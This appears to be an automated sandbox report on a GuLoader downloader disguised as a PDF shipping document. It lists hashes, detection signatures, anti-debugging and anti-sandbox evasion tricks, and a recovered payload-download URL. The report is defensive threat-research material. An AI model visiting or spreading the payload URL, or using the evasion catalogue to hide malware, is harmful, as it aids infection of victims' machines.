Play interactive tour

Edit tour

Analysis Report Shipping Document INVPLBL_pdf.exe

Overview

General Information

Sample Name:	Shipping Document INVPLBL_pdf.exe
Analysis ID:	323820
MD5:	40e23535eaeb38100848d2544f29425d
SHA1:	115391590b015b30e742095c3355b63f4ae29335
SHA256:	f76e242ad82adab98e38fbdcc1469a7066031c5345d4904035d545713355629d
Tags:	exeGuLoader
Most interesting Screenshot:

Detection

GuLoader

Score:	96
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected GuLoader

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Contains functionality to hide a thread from the debugger

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Executable has a suspicious name (potential lure to open the executable)

Hides threads from debuggers

Initial sample is a PE file and has a suspicious name

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Yara detected VB6 Downloader Generic

Abnormal high CPU Usage

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to enumerate running services

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

PE file contains strange resources

Sample file is different than original file name gathered from version info

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

Shipping Document INVPLBL_pdf.exe (PID: 7072 cmdline: 'C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe' MD5: 40E23535EAEB38100848D2544F29425D)

Shipping Document INVPLBL_pdf.exe (PID: 6704 cmdline: 'C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe' MD5: 40E23535EAEB38100848D2544F29425D)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author
Process Memory Space: Shipping Document INVPLBL_pdf.exe PID: 6704	JoeSecurity_VB6DownloaderGeneric	Yara detected VB6 Downloader Generic	Joe Security
Process Memory Space: Shipping Document INVPLBL_pdf.exe PID: 6704	JoeSecurity_GuLoader	Yara detected GuLoader	Joe Security
Process Memory Space: Shipping Document INVPLBL_pdf.exe PID: 7072	JoeSecurity_VB6DownloaderGeneric	Yara detected VB6 Downloader Generic	Joe Security
Process Memory Space: Shipping Document INVPLBL_pdf.exe PID: 7072	JoeSecurity_GuLoader	Yara detected GuLoader	Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: Shipping Document INVPLBL_pdf.exe	Virustotal: Detection: 31%			Perma Link
Source: Shipping Document INVPLBL_pdf.exe	ReversingLabs: Detection: 18%

Source: unknown

DNS traffic detected: queries for: g.msn.com

Source: Shipping Document INVPLBL_pdf.exe, 0000000A.00000002.596081636.0000000000560000.00000040.00000001.sdmp

String found in binary or memory: https://gorkaloyola.com/cashout/Kalied_zgFWOmD234.bin

System Summary:

Executable has a suspicious name (potential lure to open the executable)

Show sources

Source: Shipping Document INVPLBL_pdf.exe

Static file information: Suspicious name

Initial sample is a PE file and has a suspicious name

Show sources

Source: initial sample

Static PE information: Filename: Shipping Document INVPLBL_pdf.exe

Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe

Process Stats: CPU usage > 98%

Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_02324046 NtSetInformationThread,NtWriteVirtualMemory,CreateFileA,	0_2_02324046
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_02328117 NtProtectVirtualMemory,	0_2_02328117
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_0232062E EnumWindows,NtSetInformationThread,	0_2_0232062E
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_0232861B NtSetInformationThread,NtResumeThread,	0_2_0232861B
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_02326558 NtSetInformationThread,	0_2_02326558
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_02320A6B NtSetInformationThread,TerminateProcess,	0_2_02320A6B
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_02324887 NtSetInformationThread,NtWriteVirtualMemory,	0_2_02324887
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_02323228 NtWriteVirtualMemory,	0_2_02323228
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_023232DC NtWriteVirtualMemory,	0_2_023232DC
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_0232339C NtWriteVirtualMemory,	0_2_0232339C
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_02324018 NtSetInformationThread,	0_2_02324018
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_0232361C NtWriteVirtualMemory,	0_2_0232361C
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_02328664 NtResumeThread,	0_2_02328664
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_02320709 NtSetInformationThread,	0_2_02320709
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_02323764 NtWriteVirtualMemory,	0_2_02323764
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_02320758 NtSetInformationThread,	0_2_02320758
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_023207AC NtSetInformationThread,	0_2_023207AC
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_023287AC NtResumeThread,	0_2_023287AC
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_023287F8 NtResumeThread,	0_2_023287F8
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_023244F9 NtSetInformationThread,	0_2_023244F9
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_023234CC NtWriteVirtualMemory,	0_2_023234CC
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_02323578 NtWriteVirtualMemory,	0_2_02323578
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_02323A1C NtWriteVirtualMemory,	0_2_02323A1C
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_02328A00 NtResumeThread,	0_2_02328A00
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_02323A80 NtSetInformationThread,	0_2_02323A80
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_02322B0C NtSetInformationThread,	0_2_02322B0C
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_02328B78 NtResumeThread,	0_2_02328B78
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_02328BA6 NtResumeThread,	0_2_02328BA6
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_02326B82 NtWriteVirtualMemory,	0_2_02326B82
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_02320830 NtSetInformationThread,	0_2_02320830
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_02323818 NtWriteVirtualMemory,	0_2_02323818
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_02320863 NtSetInformationThread,	0_2_02320863
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_0232886F NtResumeThread,	0_2_0232886F
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_02328840 NtResumeThread,	0_2_02328840
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_023208D3 NtSetInformationThread,	0_2_023208D3
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_023288C8 NtResumeThread,	0_2_023288C8
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_02328910 NtResumeThread,	0_2_02328910
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_023289B0 NtResumeThread,	0_2_023289B0
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_02322F3D NtSetInformationThread,	0_2_02322F3D
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_02326FDD NtWriteVirtualMemory,	0_2_02326FDD
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_02328C48 NtResumeThread,	0_2_02328C48
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_02322CC0 NtSetInformationThread,	0_2_02322CC0
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_02322D64 NtSetInformationThread,	0_2_02322D64
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 10_2_00564046 NtSetInformationThread,CreateFileA,	10_2_00564046
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 10_2_00568117 NtProtectVirtualMemory,	10_2_00568117
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 10_2_005644F9 NtSetInformationThread,InternetOpenA,InternetOpenUrlA,	10_2_005644F9
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 10_2_00566558 NtSetInformationThread,	10_2_00566558
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 10_2_0056861B NtSetInformationThread,EnumServicesStatusA,	10_2_0056861B
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 10_2_0056062E EnumWindows,NtSetInformationThread,	10_2_0056062E
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 10_2_00560A6B NtSetInformationThread,NtProtectVirtualMemory,	10_2_00560A6B
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 10_2_00564018 NtSetInformationThread,	10_2_00564018
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 10_2_00561343 NtProtectVirtualMemory,	10_2_00561343
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 10_2_00561380 NtProtectVirtualMemory,	10_2_00561380
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 10_2_00560758 NtSetInformationThread,	10_2_00560758
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 10_2_00560709 NtSetInformationThread,	10_2_00560709
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 10_2_005607AC NtSetInformationThread,	10_2_005607AC
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 10_2_00560863 NtSetInformationThread,	10_2_00560863
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 10_2_00560830 NtSetInformationThread,	10_2_00560830
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 10_2_005608D3 NtSetInformationThread,	10_2_005608D3
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 10_2_00564887 NtSetInformationThread,	10_2_00564887
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 10_2_00563A80 NtSetInformationThread,	10_2_00563A80
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 10_2_00562B0C NtSetInformationThread,	10_2_00562B0C
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 10_2_00562CC0 NtSetInformationThread,	10_2_00562CC0
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 10_2_00562D64 NtSetInformationThread,	10_2_00562D64
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 10_2_00562F3D NtSetInformationThread,	10_2_00562F3D

Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_00405F92	0_2_00405F92
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_00406840	0_2_00406840
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_0040604C	0_2_0040604C
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_00406C4F	0_2_00406C4F
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_0040706A	0_2_0040706A
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_0040646C	0_2_0040646C
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_0040707D	0_2_0040707D
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_00407006	0_2_00407006
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_00406C09	0_2_00406C09
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_0040600D	0_2_0040600D
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_00407022	0_2_00407022
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_00406432	0_2_00406432
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_00406CDE	0_2_00406CDE
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_004060FE	0_2_004060FE
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_004068FE	0_2_004068FE
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_00406CFE	0_2_00406CFE
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_00406C8F	0_2_00406C8F
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_00406497	0_2_00406497
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_0040609A	0_2_0040609A
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_00406CA0	0_2_00406CA0
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_004068A9	0_2_004068A9
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_004064AC	0_2_004064AC
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_004070B8	0_2_004070B8
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_00406141	0_2_00406141
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_00406548	0_2_00406548
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_00406555	0_2_00406555
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_00406D6F	0_2_00406D6F
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_0040617C	0_2_0040617C
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_00406D0A	0_2_00406D0A
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_00406520	0_2_00406520
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_00406D22	0_2_00406D22
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_004069C6	0_2_004069C6
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_00406DD0	0_2_00406DD0
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_004061E0	0_2_004061E0
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_004065E1	0_2_004065E1
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_004069F3	0_2_004069F3
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_004065FB	0_2_004065FB
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_0040698F	0_2_0040698F
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_0040619F	0_2_0040619F
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_004061BC	0_2_004061BC
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_00406261	0_2_00406261
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_00406E62	0_2_00406E62
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_00406A6C	0_2_00406A6C
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_00406673	0_2_00406673
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_00406201	0_2_00406201
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_00406E10	0_2_00406E10
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_00406A18	0_2_00406A18
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_00406627	0_2_00406627
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_00406A3E	0_2_00406A3E
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_00406EE1	0_2_00406EE1
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_004066E3	0_2_004066E3
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_00406AF5	0_2_00406AF5
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_00406E82	0_2_00406E82
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_004062A9	0_2_004062A9
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_00406AA9	0_2_00406AA9
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_004066B0	0_2_004066B0
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_00406B5C	0_2_00406B5C
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_0040676F	0_2_0040676F
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_00406F76	0_2_00406F76
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_00406F7F	0_2_00406F7F
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_00406701	0_2_00406701
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_00406F0B	0_2_00406F0B
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_00406317	0_2_00406317
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_00406F26	0_2_00406F26
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_00406B38	0_2_00406B38
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_004063CC	0_2_004063CC
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_00406BD7	0_2_00406BD7
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_004067D9	0_2_004067D9
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_004067E6	0_2_004067E6
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_00406391	0_2_00406391
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_004063A8	0_2_004063A8
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_00406BB6	0_2_00406BB6

Source: Shipping Document INVPLBL_pdf.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: Shipping Document INVPLBL_pdf.exe, 00000000.00000002.450736065.00000000022F0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameuser32j% vs Shipping Document INVPLBL_pdf.exe
Source: Shipping Document INVPLBL_pdf.exe, 00000000.00000002.449599587.0000000000414000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameSkaget.exe vs Shipping Document INVPLBL_pdf.exe
Source: Shipping Document INVPLBL_pdf.exe, 0000000A.00000002.596524457.0000000002480000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemswsock.dll.muij% vs Shipping Document INVPLBL_pdf.exe
Source: Shipping Document INVPLBL_pdf.exe, 0000000A.00000000.448665148.0000000000414000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameSkaget.exe vs Shipping Document INVPLBL_pdf.exe
Source: Shipping Document INVPLBL_pdf.exe	Binary or memory string: OriginalFilenameSkaget.exe vs Shipping Document INVPLBL_pdf.exe

Source: classification engine

Classification label: mal96.troj.evad.winEXE@3/0@2/0

Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe

File created: C:\Users\user\AppData\Local\Temp\~DF5734C66BAC6D41BF.TMP

Jump to behavior

Source: Shipping Document INVPLBL_pdf.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Shipping Document INVPLBL_pdf.exe	Virustotal: Detection: 31%
Source: Shipping Document INVPLBL_pdf.exe	ReversingLabs: Detection: 18%

Source: unknown	Process created: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe 'C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe'
Source: unknown	Process created: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe 'C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe'
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Process created: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe 'C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe'	Jump to behavior

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match	File source: Process Memory Space: Shipping Document INVPLBL_pdf.exe PID: 6704, type: MEMORY
Source: Yara match	File source: Process Memory Space: Shipping Document INVPLBL_pdf.exe PID: 7072, type: MEMORY

Yara detected VB6 Downloader Generic

Show sources

Source: Yara match	File source: Process Memory Space: Shipping Document INVPLBL_pdf.exe PID: 6704, type: MEMORY
Source: Yara match	File source: Process Memory Space: Shipping Document INVPLBL_pdf.exe PID: 7072, type: MEMORY

Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_0040B456 push A9E19630h; iretd	0_2_0040B45B
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_00408400 push cs; ret	0_2_0040840A
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_0040EC06 push es; iretw	0_2_0040EBDC
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_0040C40C push ebp; iretd	0_2_0040C42F
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_0040DC34 push eax; iretd	0_2_0040DC8B
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_0040A43A push ecx; iretd	0_2_0040A43B
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_0040B8C5 push ebx; iretd	0_2_0040B8D3
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_004084A5 push 51D0883Bh; iretd	0_2_004084D3
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_0040996C push dword ptr [5D03CCEEh]; ret	0_2_0040994A
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_00409D77 push eax; retf	0_2_00409D78
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_00409927 push dword ptr [5D03CCEEh]; ret	0_2_0040994A
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_004089C6 push ecx; iretd	0_2_004089C7
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_0040F9CE push eax; iretd	0_2_0040FA3F
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_0040B1E8 push ecx; iretd	0_2_0040B1EB
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_0040F9F3 push eax; iretd	0_2_0040FA3F
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_0040A9B0 push esp; iretd	0_2_0040A9B3
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_00402647 push es; retf	0_2_00402648
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_00408E7E push esi; iretd	0_2_00408E97
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_00408A1C push 6787C079h; iretd	0_2_00408AB6
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_00408A1F push 6787C079h; iretd	0_2_00408AB6
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_0040E224 push ecx; iretd	0_2_0040E227
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_00409E2F push es; iretd	0_2_00409E32
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_00408E9A push eax; iretd	0_2_00408E9B
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_00409F44 push esi; iretd	0_2_00409F4F
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_0040B344 push ds; retf	0_2_0040B3AF
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_00409F52 push eax; iretd	0_2_00409F53
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_00407B00 push ds; retf	0_2_00407B01
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_00409FD6 push ds; ret	0_2_00409FF7
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_0040AFEB push ecx; iretd	0_2_0040AFF7
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_0040EB89 push es; iretw	0_2_0040EBDC
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_0040E38E push A95D7E27h; iretd	0_2_0040E393

Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Show sources

Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 0_2_02320A6B NtSetInformationThread,TerminateProcess,		0_2_02320A6B
Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe	Code function: 10_2_00560A6B NtSetInformationThread,NtProtectVirtualMemory,		10_2_00560A6B

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Show sources

Source: C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe

